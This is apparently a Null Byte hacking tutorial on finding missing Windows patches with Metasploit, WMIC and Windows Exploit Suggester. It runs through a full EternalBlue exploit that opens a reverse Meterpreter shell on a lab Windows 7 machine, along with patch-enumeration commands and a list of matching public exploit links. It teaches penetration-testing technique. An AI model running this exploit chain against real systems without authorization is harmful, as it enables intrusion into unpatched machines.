No operating system is stricken with as many vulnerabilities as Windows, and it's often a race to release the latest patches to fix things. From an attacker's point of view, knowing which patches are present on a Windows machine can make or break successful exploitation. Today, we will be covering three methods of patch enumeration, using Metasploit, WMIC, and Windows Exploit Suggester.
For Metasploit, we will use a post module to find missing patches. With WMIC, we will run commands directly from a shell on the system to view quick fix engineering patches. And using Windows Exploit Suggester, we will compare the installed patches on the system with a database of vulnerabilities. We will be using Kali Linux to attack an unpatched version of Windows 7.
Method 1: Metasploit
The first method we will use to identify any missing patches on the target is Metasploit. Fire it up by typing msfconsole in the terminal.
~# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
. .
.
dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
' dB' BBP
dB'dB'dB' dBBP dBP dBP BB
dB'dB'dB' dBP dBP dBP BB
dB'dB'dB' dBBBBP dBP dBBBBBBB
dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
. . dB' dBP dB'.BP
| dBP dBBBB' dBP dB'.BP dBP dBP
--o-- dBP dBP dBP dB'.BP dBP dBP
| dBBBBP dBP dBBBBP dBBBBP dBP dBP
.
.
o To boldly go where no
shell has gone before
=[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 >
We need to compromise the machine and obtain a Meterpreter session to run the post module, and since we know this is an unpatched version of Windows 7, we can quickly exploit it using EternalBlue.
Load the module with the use command:
msf5 > use exploit/windows/smb/ms17_010_eternalblue
Set the appropriate options and type run to launch the exploit:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.0.1:1337
[+] 10.10.0.104:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.0.104:445 - Connecting to target for exploitation.
[+] 10.10.0.104:445 - Connection established for exploitation.
[+] 10.10.0.104:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.104:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.0.104:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.0.104:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.0.104:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.0.104:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.104:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.104:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.104:445 - Starting non-paged pool grooming
[+] 10.10.0.104:445 - Sending SMBv2 buffers
[+] 10.10.0.104:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.104:445 - Sending final SMBv2 buffers.
[*] 10.10.0.104:445 - Sending last fragment of exploit packet!
[*] 10.10.0.104:445 - Receiving response from exploit packet
[+] 10.10.0.104:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.104:445 - Sending egg to corrupted connection.
[*] 10.10.0.104:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.104
[*] Meterpreter session 1 opened (10.10.0.1:1337 -> 10.10.0.104:49228) at 2019-10-27 12:28:32 -0500
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.104:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
We now have a Meterpreter session on the target. Since post modules work by running on an existing session in the background, we first need to background our session:
meterpreter > background
[*] Backgrounding session 1...
Then, we can load the module with the use command:
msf5 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_patches
If we type options at the prompt, Metasploit will show us all of the available options and setting for the current module:
msf5 post(windows/gather/enum_patches) > options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
KB KB2871997, KB2928120 yes A comma separated list of KB patches to search for
MSFLOCALS true yes Search for missing patchs for which there is a MSF local module
SESSION yes The session to run this module on.
All we really need to set is the session number to run this on. We could specify a comma-separated list of additional patches to search for if we wanted to, but for now, the default ones will work just fine.
Use the set command to set the number of the session we have running in the background:
msf5 post(windows/gather/enum_patches) > set session 1
session => 1
And type run to kick it off:
msf5 post(windows/gather/enum_patches) > run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
We can see that it returns the first two patches as missing, and it displays some additional potential vulnerabilities and their associated patches.
Method 2: WMIC
The next method we will use to enumerate patches uses the Windows WMIC utility. WMIC (Windows Management Instrumentation Command-Line) is a tool that is used to perform WMI operations on Windows. It is used as a command prompt of sorts and can run in both interactive and non-interactive mode.
To use this utility, we need a proper shell on the target. Luckily, we already have a Meterpreter session running, so we can use that to drop into a system shell.
Use the sessions command along with the -i flag to interact with a session:
msf5 > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
This should put us at the Meterpreter prompt — now simply type shell and we will be dropped into a system shell:
meterpreter > shell
Process 2452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Now we should be able to use the WMIC utility to view any patches that are installed. Type wmic qfe list at the prompt to list any quick fix engineering (QFE) patches that are present on the system:
C:\Windows\system32> wmic qfe list
wmic qfe list
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=2534111 W02 Hotfix KB2534111 2/25/2019
http://support.microsoft.com/?kbid=976902 W02 Update KB976902 W02\Administrator 11/21/2010
This will give us the ID, description, install information, and associated URL of the patches that are installed. We can also tack on full to our command to get a slightly different view of this data:
C:\Windows\system32> wmic qfe list full
wmic qfe list full
Caption=http://support.microsoft.com/?kbid=2534111
CSName=W02
Description=Hotfix
FixComments=
HotFixID=KB2534111
InstallDate=
InstalledBy=
InstalledOn=2/25/2019
Name=
ServicePackInEffect=
Status=
Caption=http://support.microsoft.com/?kbid=976902
CSName=W02
Description=Update
FixComments=
HotFixID=KB976902
InstallDate=
InstalledBy=W02\Administrator
InstalledOn=11/21/2010
Name=
ServicePackInEffect=
Status=
This method is nice because it doesn't require anything more than a basic shell on the target to run WMIC.
Method 3: Windows Exploit Suggester
The last method we will use to identify missing patches is Windows Exploit Suggester. This is a tool written in Python that will compare the patches installed on a target against a database of Microsoft vulnerabilities, all from our local machine.
Windows Exploit Suggester does require the output of systeminfo from the target to compare it against the database. Since we should still have shell access to our target, we can run the command:
C:\Windows\system32> systeminfo
systeminfo
Host Name: W02
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: admin2
Registered Organization:
Product ID: 00371-868-0000007-85704
Original Install Date: 2/25/2019, 2:04:46 PM
System Boot Time: 10/27/2019, 1:48:26 PM
System Manufacturer: QEMU
System Model: Standard PC (i440FX + PIIX, 1996)
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
BIOS Version: SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,461 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,494 MB
Virtual Memory: In Use: 601 MB
Page File Location(s): C:\pagefile.sys
Domain: dlab.env
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB2534111
[02]: KB976902
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.10.0.100
IP address(es)
[01]: 10.10.0.104
[02]: fe80::104:336c:a632:e39b
And save the output to a text file on our local machine:
~# cat system_info.txt
Host Name: W02
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: admin2
Registered Organization:
Product ID: 00371-868-0000007-85704
Original Install Date: 2/25/2019, 2:04:46 PM
System Boot Time: 10/27/2019, 1:48:26 PM
System Manufacturer: QEMU
System Model: Standard PC (i440FX + PIIX, 1996)
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 15 Model 6 Stepping 1 GenuineIntel ~2533 Mhz
BIOS Version: SeaBIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org, 4/1/2014
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-06:00) Central Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,461 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,494 MB
Virtual Memory: In Use: 601 MB
Page File Location(s): C:\pagefile.sys
Domain: dlab.env
Logon Server: N/A
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB2534111
[02]: KB976902
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.10.0.100
IP address(es)
[01]: 10.10.0.104
[02]: fe80::104:336c:a632:e39b
Next, we need to download the script from GitHub. The easiest way to do so is with the wget utility:
~# wget https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
--2019-10-27 12:38:34-- https://raw.githubusercontent.com/GDSSecurity/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.148.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.148.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 69175 (68K) [text/plain]
Saving to: ‘windows-exploit-suggester.py’
windows-exploit-suggester.py 100%[======================================================================================================================>] 67.55K --.-KB/s in 0.07s
2019-10-27 12:38:34 (951 KB/s) - ‘windows-exploit-suggester.py’ saved [69175/69175]
Then, install any dependencies, which, in this case, is just the python-xlrd package:
~# apt-get install python-xlrd
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
python-xlrd
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 104 kB of archives.
After this operation, 490 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 python-xlrd all 1.1.0-1 [104 kB]
Fetched 104 kB in 1s (144 kB/s)
Selecting previously unselected package python-xlrd.
(Reading database ... 408990 files and directories currently installed.)
Preparing to unpack .../python-xlrd_1.1.0-1_all.deb ...
Unpacking python-xlrd (1.1.0-1) ...
Setting up python-xlrd (1.1.0-1) ...
Processing triggers for man-db (2.8.5-2) ...
Now that the tool is set up, we need to generate the Microsoft security bulletin database. Windows Exploit Suggester can do this automatically with the update command:
~# python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2019-10-27-mssb.xls
[*] done
We should be good to go at this point. All we have to do is run the tool, and specify the systeminfo file from earlier and the database file we just generated:
~# python windows-exploit-suggester.py --database 2019-10-27-mssb.xls --systeminfo system_info.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
The script will run and return any patches that are missing on our target, along with their relevant information and links:
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 2 hotfix(es) against the 386 potential bulletins(s) with a database of 137 known exploits
[*] there are now 386 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption
...
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[*] done
This method is perhaps the most thorough since we are utilizing an updated database of patches to compare to the target. It also has the advantage of being able to run remotely.
Wrapping Up
In this tutorial, we explored a few methods to identify missing patches on a Windows machine. First, we used a Metasploit post module to achieve this, followed by the WMIC utility on Windows, and finally, the Windows Exploit Suggester Python script. Patch enumeration is extremely important when attacking Windows, as it narrows down the number of potential exploits, saves time, and generally just makes things easier.
Cover image by Breakingpic/Pexels; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!